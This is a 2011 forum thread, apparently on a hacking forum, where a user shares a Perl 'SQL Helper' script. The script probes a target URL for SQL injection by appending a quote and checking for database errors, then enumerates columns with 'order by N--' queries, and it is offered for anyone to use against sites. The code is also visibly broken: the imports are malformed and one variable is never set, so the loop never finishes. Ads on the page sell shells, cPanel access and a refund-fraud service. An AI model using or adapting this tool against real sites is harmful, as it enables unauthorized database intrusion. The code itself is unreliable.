Login Register






SMTPMart - Buy Inbox SMTP | Leads | Shell | cPanel 100% Bonus on 1st deposit | Instant Refunds
ProxyByte $2/GB | Residential IPv4 - No Logs - 26M+ IPs - All unblocked
REFUNDING.GG | #1 REFUND SERVICE | SAME DAY REFUNDS | WORLDWIDE ORDERS | GET ITEMS 85% OFF
Thread Rating:
  • 0 Vote(s) - 0 Average


[SOURCE] SQL Helper [PERL] filter_list
Author
Message
FrostByte_mybb_import5923 Offline
Perl Programmer
Twelve Years of Service
Posts: 249
Threads: 76
Reputation: 0

Points: 24NSP
[SOURCE] SQL Helper [PERL] 04-29-2011, 07:12 PM #1
Hey i wrote a quick SQL helper code, all it does is let's you know it is vulnerable then find's the columns as those are two very annoying task's involved with manual sql.

Feel free to do as you wish with it, i did code it from scratch, so it is mine to say do as you wish with.

If you are learning Perl from the tutorials i have made i wouldn't recommend trying to figure this code out you may understand bit's but there are quite a few bit's we haven't gone through yet.

Code:
use HTTP::Request; qw(get);
use LWP::UserAgent;
use LWP::Simple


print"\n\n\n\n\n-------------------------------------------------------------------------";
print"\n:::::::::::::::::::::::::: # SQL Fast Helper # ::::::::::::::::::::::::::";
print"\n-------------------------------------------------------------------------";
print"\n:::::::::::::::::::::::::: # © p-teo / Frost # ::::::::::::::::::::::::::";
print"\n-------------------------------------------------------------------------";

print "\n\nExample Site: http://www.attacksite.com/pages.php?id=79 \n\n";
print "Site: ";
chomp(my $old_url = <STDIN>);
print "Searching...\n\n";
$new_url = "$old_url'";
    my $content = get $new_url;
  die "Unable to find $site" unless defined $content;
    if($content =~ "MySQL", "You have an error in your SQL syntax", "Script error: cannot query database.") {
print"\n\n* SQL Error Has been Located, You may proceen with your attack\n\n";

} else {
print"No SQL error was found."
}
print"* Would you like to Find the colums? Y / N\t|>> ";
chomp(my $yesorno = <STDIN>);
if ($yesorno eq "Y") {
my $num = 1;
my $errorFound = 0;
my $content1;
my $new_url2;
while($errorFound == 0){
    $new_url2 = $old_url;
    $new_url2 .= " order by $num--";
    $content = get("$new_url2");
    if($content1 eq "Unknown column '$num' in 'order clause'"){
        print $content1 . "\n\n";
        $errorFound = 1;
        print "The url is :: $new_url2\n";
        print "Column's Error found";
        
    }
    $num++;
}

} else {
print"Press Enter to exit.";
}

Hope you like this contribution.
[Image: 6caf54.gif]

Website
Reply







Users browsing this thread: 2 Guest(s)